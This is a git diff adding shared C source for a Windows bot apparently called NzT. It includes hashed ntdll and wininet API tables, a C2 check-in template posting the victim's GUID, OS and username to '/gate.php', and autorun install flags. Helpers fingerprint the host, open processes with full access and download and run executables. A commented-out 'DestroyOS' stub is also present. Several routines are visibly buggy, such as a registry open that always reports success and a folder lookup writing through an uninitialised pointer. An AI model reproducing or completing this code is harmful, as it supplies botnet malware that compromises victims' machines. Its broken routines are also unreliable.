b/src/Shared/ntdll_hash.h @@ -0,0 +1,45 @@ +#ifndef _NT_HASH_H_ +#define _NT_HASH_H_ + +#define HASH_NTDLL 0x26797e77 +#define HASH_NTDLL_RTLGETVERSION 0xb46508b5 +#define HASH_NTDLL_RTLRANDOMEX 0x9ab4737e +#define HASH_NTDLL_NTCREATETHREAD 0xca6b0d7b +#define HASH_NTDLL_NTQUERYINFORMATIONPROCESS 0xa5c44c50 +#define HASH_NTDLL_NTCREATEUSERPROCESS 0x05aaa327 +#define HASH_NTDLL_NTMAPVIEWOFSECTION 0xa4163ebc +#define HASH_NTDLL_NTCREATESECTION 0x9eee4b80 +#define HASH_NTDLL_LDRLOADDLL 0x183679f2 +#define HASH_NTDLL_LDRGETDLLHANDLE 0xe21c1c46 +#define HASH_NTDLL_NTWRITEVIRTUALMEMORY 0xe4879939 +#define HASH_NTDLL_NTALLOCATEVIRTUALMEMORY 0xe0762feb +#define HASH_NTDLL_NTPROTECTVIRTUALMEMORY 0x5c2d1a97 +#define HASH_NTDLL_NTDEVICEIOCONTROLFILE 0x5c8e65ac +#define HASH_NTDLL_NTSETCONTEXTTHREAD 0xe1453b98 +#define HASH_NTDLL_NTOPENPROCESS 0xdbf381b5 +#define HASH_NTDLL_NTCLOSE 0x0d09c750 +#define HASH_NTDLL_NTCREATEFILE 0x3ee6cc56 +#define HASH_NTDLL_NTOPENFILE 0xa1b1dc21 +#define HASH_NTDLL_NTDELETEFILE 0xff9bc7af +#define HASH_NTDLL_NTREADVIRTUALMEMORY 0x81223212 +#define HASH_NTDLL_NTQUERYVIRTUALMEMORY 0x03f6f38c +#define HASH_NTDLL_NTOPENTHREAD 0xb7a26d79 +#define HASH_NTDLL_NTQUERYINFORMATIONTHREAD 0x31133574 +#define HASH_NTDLL_NTRESUMETHREAD 0x6273b572 +#define HASH_NTDLL_LDRINITIALIZETHUNK 0xfcea01e0 +#define HASH_NTDLL_NTFREEVIRTUALMEMORY 0xe9d6ce5e +#define HASH_NTDLL_NTFLUSHINSTRUCTIONCACHE 0x85bf2f9c +#define HASH_NTDLL_NTSETINFORMATIONTHREAD 0x466f2056 +#define HASH_NTDLL_NTQUERYSYSTEMINFORMATION 0x97fd2398 +#define HASH_NTDLL_LDRQUERYPROCESSMODULEINFORMATION 0xa1b699e6 +#define HASH_NTDLL_RTLINITUNICODESTRING 0x7aa7b69b +#define HASH_NTDLL_NTWRITEFILE 0x3afbe45b +#define HASH_NTDLL_NTREADFILE 0xa2c81105 +#define HASH_NTDLL_NTDELAYEXECUTION 0xf5a86278 +#define HASH_NTDLL_NTOPENKEY 0xa6951756 +#define HASH_NTDLL_NTSETVALUEKEY 0xa566a93e +#define HASH_NTDLL_NTQUERYVALUEKEY 0x55ba7014 +#define HASH_NTDLL_RTLFORMATCURRENTUSERKEYPATH 0x7fa58340 +#define HASH_NTDLL_NTQUERYINFORMATIONFILE 0xf675d37d + +#endif \ No newline at end of file diff --git a/src/Shared/nzt.h b/src/Shared/nzt.h new file mode 100644 index 0000000..83e7c0c --- /dev/null +++ b/src/Shared/nzt.h @@ -0,0 +1,34 @@ +#ifndef __BOT_H__ +#define __BOT_H__ + +#include "api.h" + +#define DEBUG + +#define _REPORT // Report to HTTP C2 +#define _INSTALL // Install to system and autorun + +typedef INT WINERROR; // One of the Windows error codes defined within winerror.h +#define ERROR_UNSUCCESSFULL 0xffffffff // Common unsuccessfull code +#define INVALID_INDEX (-1) + +#define CURRENT_PROCESS (HANDLE)-1 +#define API(Function) NzT.Api.p##Function + +typedef enum INFECTION_TYPES +{ + RUNNING_INFECTION = 1, + NEW_INFECTION = 2 +} INFECTION_TYPE; + +typedef struct +{ + API_FUNCTIONS Api; + API_MODULES Modules; + CRC Crc; + INFECTION_TYPE Type; +} NzT_T; + +extern NzT_T NzT; + +#endif __BOT_H__ \ No newline at end of file diff --git a/src/Shared/registry.c b/src/Shared/registry.c new file mode 100644 index 0000000..d945697 --- /dev/null +++ b/src/Shared/registry.c @@ -0,0 +1,171 @@ +#include "registry.h" +#include "nzt.h" +#include "utils.h" +#include "crt.h" + +static LPWSTR GetRegistryStartPath(INT Hive) +{ + LPWSTR Path = NULL; + UNICODE_STRING US; + + if (Hive == HIVE_HKEY_LOCAL_MACHINE) + { + if (!StringConcatW(&Path, L"\\Registry\\Machine\\")) + return NULL; + } + else + { + MemoryZero(&US, sizeof(UNICODE_STRING)); + + if (API(RtlFormatCurrentUserKeyPath(&US)) >= 0) + { + if (!StringConcatW(&Path, US.Buffer)) + return NULL; + } + } + + if (!StringEndsWithSlashW(Path)) + { + if (!StringConcatW(&Path, L"\\")) + { + Free(Path); + Path = NULL; + } + } + + return Path; +} + +BOOL RegistryOpenKeyEx(CONST LPWSTR KeyPath, HANDLE RegistryHandle, ACCESS_MASK AccessMask) +{ + OBJECT_ATTRIBUTES OJ; + UNICODE_STRING US; + BOOL Status = FALSE; + + if (!StringToUnicode(&US, KeyPath)) + return FALSE; + + MemoryZero(&OJ, sizeof(OBJECT_ATTRIBUTES)); + + OJ.Length = sizeof(OBJECT_ATTRIBUTES); + OJ.Attributes = OBJ_CASE_INSENSITIVE; + OJ.ObjectName = &US; + + if (API(NtOpenKey)(RegistryHandle, AccessMask, &OJ) >= 0) + Status = TRUE; + + return TRUE; +} + +BOOL RegistryReadValueEx(CONST LPWSTR KeyPath, CONST LPWSTR Name, LPWSTR* Value) +{ + HANDLE Key; + UNICODE_STRING US; + KEY_VALUE_PARTIAL_INFORMATION* KVPI; + KEY_VALUE_PARTIAL_INFORMATION KV; + DWORD Size = 0; + BOOL Status = FALSE; + + if (!StringToUnicode(&US, Name)) + return FALSE; + + if (!RegistryOpenKeyEx(KeyPath, &Key, KEY_READ)) + return FALSE; + + MemoryZero(&KV, sizeof(KEY_VALUE_PARTIAL_INFORMATION)); + + API(NtQueryValueKey)(Key, &US, KeyValuePartialInformation, &KV, sizeof(KEY_VALUE_PARTIAL_INFORMATION), &Size); + + if (Size != 0) + { + if ((KVPI = Malloc(Size)) != 0) + { + if (API(NtQueryValueKey)(Key, &US, KeyValuePartialInformation, KVPI, Size, &Size) >= 0) + { + if ((*Value = Malloc(KVPI->DataLength + 2)) != 0) + { + MemoryCopy(*Value, KVPI->Data, KVPI->DataLength); + Status = TRUE; + } + } + + Free(KVPI); + } + + API(NtClose)(Key); + } + + return Status; +} + +BOOL RegistryReadValue(INT Hive, CONST LPWSTR Path, CONST LPWSTR Name, LPWSTR* Value) +{ + LPWSTR RegistryPath = NULL; + BOOL Status = FALSE; + + if ((RegistryPath = GetRegistryStartPath(Hive)) == 0) + return FALSE; + + if (StringConcatW(&RegistryPath, Path)) + Status = RegistryReadValueEx(RegistryPath, Name, Value); + + Free(RegistryPath); + + return Status; + +} +/* +WINERROR RegistryReadValue( + LPTSTR ValueName, + PCHAR* Buffer, + PULONG BufferSize +) +{ + WINERROR Status = NO_ERROR; + HKEY SubKey; + ULONG DataType = 0; + PCHAR pBuffer; + + if ((Status = RegOpenKey(HKEY_CURRENT_USER, "", &SubKey)) == NO_ERROR) + { + if ((Status = RegQueryValueEx(SubKey, ValueName, 0, &DataType, NULL, BufferSize)) == NO_ERROR) + { + if (pBuffer == Malloc(*BufferSize)) + { + if ((Status = RegQueryValueEx(SubKey, ValueName, 0, &DataType, pBuffer, BufferSize)) == NO_ERROR) + Buffer = pBuffer; + else + Free(pBuffer); + } //if (pBuffer == Malloc(*BufferSize)) + else + Status = ERROR_NOT_ENOUGH_MEMORY; + } // if ((Status = RegQueryValueEx(SubKey, ValueName, 0, &DataType, NULL, BufferSize)) == NO_ERROR) + RegCloseKey(SubKey); + } // if ((Status = RegOpenKey(HKEY_CURRENT_USER, "", &SubKey)) == NO_ERROR) + + return Status; +} + +WINERROR RegistryWriteValue( + LPTSTR ValueName, + PCHAR Buffer, + ULONG BufferSize, + ULONG Type +) +{ + BOOL Status = NO_ERROR; + HKEY SubKey; + ULONG DataType = 0; + + if ((Status = RegOpenKey(HKEY_CURRENT_USER, "", &SubKey)) == NO_ERROR) + { + if (Buffer) + Status = RegSetValueEx(SubKey, ValueName, 0, Type, Buffer, BufferSize); + else + Status = RegDeleteValue(SubKey, ValueName); + + RegCloseKey(SubKey); + } + + return Status; +}*/ \ No newline at end of file diff --git a/src/Shared/registry.h b/src/Shared/registry.h new file mode 100644 index 0000000..680e118 --- /dev/null +++ b/src/Shared/registry.h @@ -0,0 +1,14 @@ +#ifndef __REGISTRY_H__ +#define __REGISTRY_H__ + +enum REGISTRY_HIVE +{ + HIVE_HKEY_CURRENT_USER = 0, + HIVE_HKEY_LOCAL_MACHINE = 1 +}; + +BOOL RegistryOpenKeyEx(CONST LPWSTR KeyPath, HANDLE RegistryHandle, ACCESS_MASK AccessMask); +BOOL RegistryReadValueEx(CONST LPWSTR KeyPath, CONST LPWSTR Name, LPWSTR* Value); +BOOL RegistryReadValue(INT Hive, CONST LPWSTR Path, CONST LPWSTR Name, LPWSTR* Value); + +#endif \ No newline at end of file diff --git a/src/Shared/shell32_functions.h b/src/Shared/shell32_functions.h new file mode 100644 index 0000000..2555ca8 --- /dev/null +++ b/src/Shared/shell32_functions.h @@ -0,0 +1,9 @@ +#ifndef __SHELL32_FUNCTIONS_H__ +#define __SHELL32_FUNCTIONS_H__ + +#include +#include + +typedef HRESULT(WINAPI* ptSHGetFolderPathW)(_Reserved_ HWND hwnd, _In_ int csidl, _In_opt_ HANDLE hToken, _In_ DWORD dwFlags, _Out_writes_(MAX_PATH) LPWSTR pszPath); + +#endif //__SHELL32_FUNCTIONS_H__ \ No newline at end of file diff --git a/src/Shared/shell32_hash.h b/src/Shared/shell32_hash.h new file mode 100644 index 0000000..a9ecac8 --- /dev/null +++ b/src/Shared/shell32_hash.h @@ -0,0 +1,7 @@ +#ifndef __SHELL32_HASH_H__ +#define __SHELL32_HASH_H__ + +#define HASH_SHELL32 0x3b42cf7f +#define HASH_SHELL32_SHGETFOLDERPATHW 0xc7652b3f + +#endif //__SHELL32_HASH_H__ \ No newline at end of file diff --git a/src/Shared/strings.h b/src/Shared/strings.h new file mode 100644 index 0000000..ff84e6f --- /dev/null +++ b/src/Shared/strings.h @@ -0,0 +1,10 @@ +#ifndef __STRINGS_H__ +#define __STRINGS_H__ + +#define STRING_REPORT_GATE_URL "/gate.php" +#define STRING_REPORT_DATA "type=%d&guid=%s&os=%d&arch=%d&username=%s" + +#define WSTRING_BACKSLASH L"\\" +#define WSTRING_DOT_EXE L".exe" + +#endif \ No newline at end of file diff --git a/src/Shared/user32_functions.h b/src/Shared/user32_functions.h new file mode 100644 index 0000000..7b97271 --- /dev/null +++ b/src/Shared/user32_functions.h @@ -0,0 +1,22 @@ +#ifndef __USER32_FUNCTIONS_H__ +#define __USER32_FUNCTIONS_H__ + +#include + +typedef int(WINAPI* ptMessageBoxA)( + _In_opt_ HWND, + _In_opt_ LPCSTR, + _In_opt_ LPCSTR, + _In_ UINT + ); + +typedef int (WINAPIV* ptwsprintfW)( + _Out_ LPWSTR, + _In_ _Printf_format_string_ LPCWSTR, + ...); + +typedef BOOL(WINAPI* ptGetCursorPos)( + _Out_ LPPOINT lpPoint + ); + +#endif //__USER32_FUNCTIONS_H__ \ No newline at end of file diff --git a/src/Shared/user32_hash.h b/src/Shared/user32_hash.h new file mode 100644 index 0000000..d5c3ba4 --- /dev/null +++ b/src/Shared/user32_hash.h @@ -0,0 +1,10 @@ +#ifndef __USER32_HASH__ +#define __USER32_HASH__ + +#define HASH_USER32 0x48fa9930 +#define HASH_USER32_MESSAGEBOXA 0x572D5D8E +#define HASH_USER32_WSPRINTFW 0x201d0dd6 +#define HASH_USER32_WSPRINTFA 0xd4c9b887 +#define HASH_USER32_GETCURSORPOS 0x89606806 + +#endif //__USER32_HASH__ \ No newline at end of file diff --git a/src/Shared/utils.c b/src/Shared/utils.c new file mode 100644 index 0000000..5a89cbb --- /dev/null +++ b/src/Shared/utils.c @@ -0,0 +1,384 @@ +#include "utils.h" +#include "crt.h" +#include "nzt.h" +#include "config.h" +#include "registry.h" + +DWORD GenerateSeed(DWORD Seed) +{ + return (NZT_VERSION + Seed); +} + +DWORD RandomNumber(DWORD Seed) +{ + ULONG Random = 0; + Random = Seed; + return API(RtlRandomEx(&Random)); +} + +DWORD GetRandomNumber() +{ + ULONG Random; + POINT Point; + + MemoryZero(&Point, sizeof(POINT)); + + if (!API(GetCursorPos)(&Point)) + return 0; + + Random = (Point.x * Point.y) * API(GetTickCount()); + + return RandomNumber(Random); +} + +DWORD GetOperatingSystem() +{ + DWORD OS = 0; + OSVERSIONINFOEXW Version; + + MemoryZero(&Version, sizeof(OSVERSIONINFOEXW)); + Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW); + + if (API(RtlGetVersion) != NULL) + API(RtlGetVersion)((PRTL_OSVERSIONINFOW)&Version); + + if (API(RtlGetVersion) == NULL) + API(GetVersionExW)((LPOSVERSIONINFOW)&Version); + + if (Version.dwMajorVersion == 5 && Version.dwMinorVersion == 0) + OS = WINDOWS_2000; + else if (Version.dwMajorVersion == 5 && Version.dwMinorVersion > 0) + OS = WINDOWS_XP; + else if (Version.dwMajorVersion == 6 && Version.dwMinorVersion == 0) + OS = WINDOWS_VISTA; + else if (Version.dwMajorVersion == 6 && Version.dwMinorVersion == 1) + OS = WINDOWS_7; + else if (Version.dwMajorVersion == 6 && Version.dwMinorVersion == 2) + OS = WINDOWS_8; + else if (Version.dwMajorVersion == 6 && Version.dwMinorVersion == 3) + OS = WINDOWS_8_1; + else if (Version.dwMajorVersion == 10 && Version.dwMinorVersion == 0) + OS = WINDOWS_10; + else if (Version.dwMajorVersion == 10 && Version.dwMinorVersion == 0 && Version.dwBuildNumber >= 22000) + OS = WINDOWS_11; + + return OS; +} + +PPEB GetPeb(VOID) +{ +#ifdef WIN64 + return (PPEB)__readgsqword(0x60); +#else + return (PPEB)__readfsdword(0x30); +#endif +} + +BOOL Is64Bit() +{ +#if defined(_WIN64) + return TRUE; // 64-bit programs run only on Win64 +#elif defined(_WIN32) + // 32-bit programs run on both 32-bit and 64-bit Windows + // so must sniff + BOOL b64 = FALSE; + return API(IsWow64Process)(API(GetCurrentProcess()), &b64) && b64; +#else + return FALSE; // Win64 does not support Win16 +#endif +} + +PDWORD GetSerialNumber() +{ + wchar_t VolumeBuffer[MAX_PATH], FileSysName[MAX_PATH]; + static DWORD SerialNumber; + DWORD MaximumComponentLength; + DWORD SysFlags; + HANDLE hVolume; + BOOL bResult = FALSE; + + MemoryZero(&VolumeBuffer, sizeof(VolumeBuffer)); + MemoryZero(&FileSysName, sizeof(FileSysName)); + + if ((hVolume = API(FindFirstVolumeW)(VolumeBuffer, MAX_PATH)) == INVALID_HANDLE_VALUE) + return 0; + + bResult = API(GetVolumeInformationW)(VolumeBuffer, NULL, MAX_PATH, &SerialNumber, &MaximumComponentLength, &SysFlags, FileSysName, MAX_PATH); + + API(FindVolumeClose)(hVolume); + + if (bResult) + return &SerialNumber; + + return 0; +} + +LPSTR GetUsername() +{ + static CHAR Buffer[255]; + CHAR Username[255]; + DWORD Size = 255; + + MemoryZero(&Username, sizeof(Username)); + + if (API(GetUserNameA)(Username, &Size)) + API(wsprintfA)(Buffer, "%s", Username); + + return Buffer; +} + +BOOL GetModulePath( + HMODULE Module, // a handle of the module within current process + PVOID* ModulePath, // returned module path + BOOL bUnicode +) +{ + BOOL Status; + ULONG rSize, Size = MAX_PATH; + PVOID Path; + + while ((Path = Malloc(Size * sizeof(WCHAR))) && + (rSize = (API(GetModuleFileNameW)(Module, Path, Size))) && + (Size == rSize)) + { + Size += MAX_PATH; + Free(Path); + } + + if (Path) + { + if (rSize) + { + *ModulePath = Path; + Status = TRUE; + } + else + { + Status = FALSE; + Free(Path); + } + } + else + Status = FALSE; + + return(Status); +} + +LPWSTR GetSystem32() +{ + wchar_t SystemDirectory[MAX_PATH]; + MemoryZero(&SystemDirectory, sizeof(SystemDirectory)); + + if (API(GetSystemDirectoryW)(SystemDirectory, MAX_PATH) != 0) + { + return StringCopyW(SystemDirectory, StringLengthW(SystemDirectory)); + } + + return NULL; +} + +PWCHAR GetFolderPath(DWORD CSIDL) +{ + LPWSTR FolderPath; + WCHAR Buffer[MAX_PATH]; + + MemoryZero(&FolderPath, sizeof(FolderPath)); + API(SHGetFolderPathW)(0, CSIDL, 0, 0, FolderPath); + + if ((FolderPath = StringCopyW(Buffer, StringLengthW(Buffer))) == NULL) + return NULL; + + if (!StringEndsWithSlashW(FolderPath)) + StringConcatW(&FolderPath, L"\\"); + + return FolderPath; +} + +LPWSTR GetDirectoryPath(int PathIndex) +{ + LPWSTR Names[] = { L"AppData", L"Desktop", L"Startup" }; + LPWSTR Path; + + if (RegistryReadValue(HIVE_HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", Names[PathIndex], &Path)) + { + if (!StringEndsWithSlashW(Path)) + { + if (!StringConcatW(&Path, L"\\")) + { + Free(Path); + Path = NULL; + } + } + + return Path; + } + + return NULL; +} + +DWORD GetProcessIdByHandle(HANDLE Process) +{ + DWORD PbiSize = 0; + PROCESS_BASIC_INFORMATION pbi; + + MemoryZero(&pbi, sizeof(PROCESS_BASIC_INFORMATION)); + + if (API(NtQueryInformationProcess)(Process, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &PbiSize) >= 0 && pbi.PebBaseAddress != 0) + { + return pbi.UniqueProcessId; + } + + return -1; +} + +DWORD GetProcessIdByHash(DWORD Hash) +{ + HANDLE Snapshot; + PROCESSENTRY32W ProcessEntry; + DWORD ProcessId = -1; + DWORD CurrentHash = 0; + + if ((Snapshot = API(CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE) + return -1; + + if (!API(Process32FirstW)(Snapshot, &ProcessEntry)) + { + API(CloseHandle)(Snapshot); + return -1; + } + + do + { + CurrentHash = Crc32Hash(ProcessEntry.szExeFile, StringLengthW(ProcessEntry.szExeFile) * 2); + + if (CurrentHash == Hash) + { + ProcessId = ProcessEntry.th32ProcessID; + break; + } + } while (API(Process32NextW(Snapshot, &ProcessEntry))); + + API(CloseHandle)(Snapshot); + return ProcessId; +} + +HANDLE GetProcessByName(LPWSTR name) +{ + DWORD pid = 0; + + HANDLE snapshot = API(CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0); + PROCESSENTRY32W process; + MemoryZero(&process, sizeof(process)); + process.dwSize = sizeof(process); + + if (API(Process32FirstW)(snapshot, &process)) + { + do + { + if (!StringCompareW(process.szExeFile, name)) + { + pid = process.th32ProcessID; + break; + } + } while (API(Process32NextW)(snapshot, &process)); + } + + API(CloseHandle)(snapshot); + + if (pid != 0) + return API(OpenProcess)(PROCESS_ALL_ACCESS, FALSE, pid); + + + return NULL; +} + +BOOL StartFileProcess(CONST PWCHAR Path, BOOL ShowWindow) +{ + STARTUPINFOW StartupInfo; + PROCESS_INFORMATION ProcessInformation; + DWORD Show = ShowWindow ? CREATE_NO_WINDOW : 0; + + MemoryZero(&StartupInfo, sizeof(STARTUPINFOW)); + MemoryZero(&ProcessInformation, sizeof(PROCESS_INFORMATION)); + + if (!API(CreateProcessW)(Path, Path, 0, 0, FALSE, Show, 0, 0, &StartupInfo, &ProcessInformation)) + return FALSE; + + API(CloseHandle)(ProcessInformation.hProcess); + API(CloseHandle)(ProcessInformation.hThread); + + return TRUE; +} + +BOOL DownloadFile(CONST PCHAR URL, BOOL Execute) +{ + LPWSTR TempPath; + WCHAR DownloadPath[MAX_PATH], wzURL[MAX_PATH]; + + if ((TempPath = GetFolderPath(CSIDL_LOCAL_APPDATA)) == NULL) + return FALSE; + + MemoryZero(&DownloadPath, sizeof(DownloadPath)); + API(wsprintfW)(DownloadPath, L"%s%d.exe", TempPath, GetRandomNumber()); + + MemoryZero(&wzURL, sizeof(wzURL)); + API(MultiByteToWideChar)(CP_ACP, MB_PRECOMPOSED, URL, StringLengthA(URL), (LPWSTR)&wzURL, MAX_PATH); + + /*if (URLDownloadToFileW(0, wzURL, DownloadPath, 0, 0) != S_OK) + return FALSE;*/ + + if (Execute) + return StartFileProcess(DownloadPath, TRUE); + + return TRUE; +} + +VOID _Sleep(DWORD Miliseconds) +{ + LARGE_INTEGER li; + li.QuadPart = -((LONGLONG)Miliseconds * 10000); + API(NtDelayExecution)(FALSE, &li); +} + +HANDLE CreateMutexOfProcess(DWORD ProcessID) +{ + HANDLE Mutex; + wchar_t wzMutex[255]; + + MemoryZero(&wzMutex, sizeof(wzMutex)); + API(wsprintfW)(wzMutex, L"%x%x", GetSerialNumber(), ProcessID); + + if ((Mutex = API(OpenMutexW)(SYNCHRONIZE, FALSE, wzMutex)) == 0) + { + return API(CreateMutexW)(0, FALSE, wzMutex); + } + + API(CloseHandle)(Mutex); + + return 0; +} + +/*WINERROR DestroyOS() +{ + WINERROR Status = ERROR_NOT_ENOUGH_MEMORY; + LPTSTR Drive, Volume; + HANDLE File; + + if (Drive = Malloc(MAX_PATH)) + { + if (GetWindowsDirectory(Drive, MAX_PATH)) + { + Volume = strchr(Drive, ':'); + Volume[1] = 0; + Volume += 2; + + wsprintf(Volume, "", Drive); + + File = CreateFileA(Volume, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0); + if (File != INVALID_HANDLE_VALUE) + { + + } + } + } +}*/ \ No newline at end of file diff --git a/src/Shared/utils.h b/src/Shared/utils.h new file mode 100644 index 0000000..1d27014 --- /dev/null +++ b/src/Shared/utils.h @@ -0,0 +1,85 @@ +#ifndef _UTILS_H_ +#define _UTILS_H_ + +#include "crypto.h" + +#pragma intrinsic(_byteswap_ushort) +#pragma intrinsic(_byteswap_ulong) +#define htonS(x) _byteswap_ushort(x) +#define htonL(x) _byteswap_ulong(x) + +#ifdef DEBUG +#define DebugPrint(args, ...) \ + { char* buff = (char*)Malloc(128); \ + API(wsprintfA)(buff, args, __VA_ARGS__); \ + API(OutputDebugStringA)((LPCSTR)buff); \ + Free(buff); } + +#define DebugPrintW(args, ...) \ + { wchar_t* buff = (wchar_t*)Malloc(128); \ + API(wsprintfW)(buff, args, __VA_ARGS__); \ + API(OutputDebugStringW)((LPCWSTR)buff); \ + Free(buff); } +#else +#define DebugPrint(x, ...) +#define DebugPrintW(x, ...) +#endif + +/* Enum */ +enum OS_VERSION +{ + WINDOWS_2000 = 0, + WINDOWS_XP = 1, + WINDOWS_VISTA = 2, + WINDOWS_7 = 3, + WINDOWS_8 = 4, + WINDOWS_8_1 = 5, + WINDOWS_10 = 6, + WINDOWS_11 = 7, + WINDOWS_SERVER_2000 = 8, + WINDOWS_SERVER_2003 = 9, + WINDOWS_SERVER_2008 = 10, + WINDOWS_SERVER_2012 = 11, + WINDOWS_SERVER_2016 = 12 +}; + +enum OS_ARCHITECTURE +{ + X86 = 0, + X64 = 1 +}; + +enum OS_PATH +{ + PATH_APPDATA = 0, + PATH_DESKTOP, + PATH_STARTUP +}; + +/* Functions */ +DWORD GenerateSeed(DWORD Seed); +DWORD RandomNumber(DWORD Seed); +DWORD GetRandomNumber(); + +BOOL GetModulePath( + HMODULE Module, // a handle of the module within current process + PVOID* ModulePath, // returned module path + BOOL bUnicode +); + + +BOOL DownloadFile(CONST PCHAR URL, BOOL Execute); +DWORD GetOperatingSystem(); +PPEB GetPeb(VOID); +BOOL Is64Bit(); +BOOL IsAdmin(); +PDWORD GetSerialNumber(); +LPSTR GetUsername(); +DWORD GetProcessIdByHandle(HANDLE Process); +DWORD GetProcessIdByHash(DWORD Hash); +HANDLE CreateMutexOfProcess(DWORD ProcessID); +LPWSTR GetSystem32(); +LPWSTR GetDirectoryPath(int PathIndex); +VOID _Sleep(DWORD Miliseconds); + +#endif \ No newline at end of file diff --git a/src/Shared/wininet_functions.h b/src/Shared/wininet_functions.h new file mode 100644 index 0000000..f74b1e7 --- /dev/null +++ b/src/Shared/wininet_functions.h @@ -0,0 +1,72 @@ +#ifndef __WININET_FUNCTIONS_H__ +#define __WININET_FUNCTIONS_H__ + +#include +#include + +typedef HINTERNET(WINAPI* ptInternetOpenW)( + _In_opt_ LPCWSTR lpszAgent, + _In_ DWORD dwAccessType, + _In_opt_ LPCWSTR lpszProxy, + _In_opt_ LPCWSTR lpszProxyBypass, + _In_ DWORD dwFlags + ); + +typedef HINTERNET(WINAPI* ptInternetConnectA)( + _In_ HINTERNET hInternet, + _In_ LPCSTR lpszServerName, + _In_ INTERNET_PORT nServerPort, + _In_opt_ LPCSTR lpszUserName, + _In_opt_ LPCSTR lpszPassword, + _In_ DWORD dwService, + _In_ DWORD dwFlags, + _In_opt_ DWORD_PTR dwContext + ); + +typedef BOOL(WINAPI* ptHttpSendRequestA)( + _In_ HINTERNET hRequest, + _In_reads_opt_(dwHeadersLength) LPCSTR lpszHeaders, + _In_ DWORD dwHeadersLength, + _In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional, + _In_ DWORD dwOptionalLength + ); + +typedef BOOL(WINAPI* ptHttpSendRequestW)( + __in HINTERNET hRequest, + __in_ecount_opt(dwHeadersLength) LPCWSTR lpszHeaders, + __in DWORD dwHeadersLength, + __in_bcount_opt(dwOptionalLength) LPVOID lpOptional, + __in DWORD dwOptionalLength + ); + +typedef HINTERNET(WINAPI* ptHttpOpenRequestA)( + _In_ HINTERNET hConnect, + _In_opt_ LPCSTR lpszVerb, + _In_opt_ LPCSTR lpszObjectName, + _In_opt_ LPCSTR lpszVersion, + _In_opt_ LPCSTR lpszReferrer, + _In_opt_z_ LPCSTR FAR * lplpszAcceptTypes, + _In_ DWORD dwFlags, + _In_opt_ DWORD_PTR dwContext + ); + +typedef BOOL (WINAPI* ptHttpQueryInfoA)( + IN HINTERNET hRequest, + IN DWORD dwInfoLevel, + IN OUT LPVOID lpBuffer, + IN OUT LPDWORD lpdwBufferLength, + IN OUT LPDWORD lpdwIndex +); + +typedef BOOL(WINAPI* ptInternetCloseHandle)( + _In_ HINTERNET hInternet + ); + +typedef BOOL(WINAPI* ptInternetReadFile)( + _In_ HINTERNET hFile, + _Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer, + _In_ DWORD dwNumberOfBytesToRead, + _Out_ LPDWORD lpdwNumberOfBytesRead + ); + +#endif __WININET_FUNCTIONS_H__ \ No newline at end of file diff --git a/src/Shared/wininet_hash.h b/src/Shared/wininet_hash.h new file mode 100644 index 0000000..164d59d --- /dev/null +++ b/src/Shared/wininet_hash.h @@ -0,0 +1,16 @@ +#ifndef __WININET_HASH_H__ +#define __WININET_HASH_H__ + +#define HASH_WININET 0x248685e7 +#define HASH_WININET_HTTPSENDREQUESTA 0xff00b1f6 +#define HASH_WININET_HTTPSENDREQUESTW 0x0bd404a7 +#define HASH_WININET_INTERNETQUERYOPTIONA 0xc54f9558 +#define HASH_WININET_HTTPOPENREQUESTA 0x447d086b +#define HASH_WININET_HTTPOPENREQUESTW 0xb0a9bd3a +#define HASH_WININET_INTERNETCLOSEHANDLE 0xe5191d24 +#define HASH_WININET_INTERNETCONNECTW 0x369b10a5 +#define HASH_WININET_INTERNETCONNECTA 0xc24fa5f4 +#define HASH_WININET_INTERNETOPENW 0x2ec21d6c +#define HASH_WININET_INTERNETREADFILE 0x6cc098f5 + +#endif __WININET_HASH_H__ \ No newline at end of file diff --git a/src/Tools/Dbgview.exe b/src/Tools/Dbgview.exe new file mode 100644 index 0000000..bc704d1 Binary files /dev/null and b/src/Tools/Dbgview.exe differ